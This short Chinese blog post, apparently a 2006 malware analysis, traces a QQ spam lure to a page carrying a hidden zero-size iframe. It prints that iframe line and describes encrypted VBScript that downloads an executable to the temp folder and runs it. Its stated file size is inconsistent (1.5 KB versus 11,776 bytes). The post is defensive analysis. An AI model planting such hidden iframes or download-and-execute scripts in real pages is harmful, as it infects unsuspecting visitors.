endurer 原创
2006-11-21 第1版
QQ收到如下信息:
/-----------
宝贝喊!本室网址:hxxp://www.h*z**uptown.com/ui.asp$y=3 游客们速度拉满 300人激情不断,让大家都享受一下异性诱惑的感觉!,不来你会后悔的哦~
-----------/
打开hxxp://www.h*z**uptown.com/ui.asp$y=3,网页标题为:偷情语音视频聊天室---建议登陆用户使用显示屏分辨率(1024*768)为最佳。
网页末包含代码:
/-----------
<iframe src="hxxp://www.i***t**q.or.k**r/images/image**/setup*.htm" width="0" height="0" frameborder="0"></iframe>
-----------/
hxxp://www.i***t**q.or.k**r/images/image**/setup*.htm 的内容为escape()和正则表达式(replace)加密的VBScript代码(现在的代码喜欢用汉字了-_-!),功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 DNCJ.exe,保存为%temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
DNCJ.exe 文件大小为1.5 KB (11,776 字节),采用WinZip 32-bit SFX 8.x module加壳。
1万+

被折叠的 条评论
为什么被折叠?



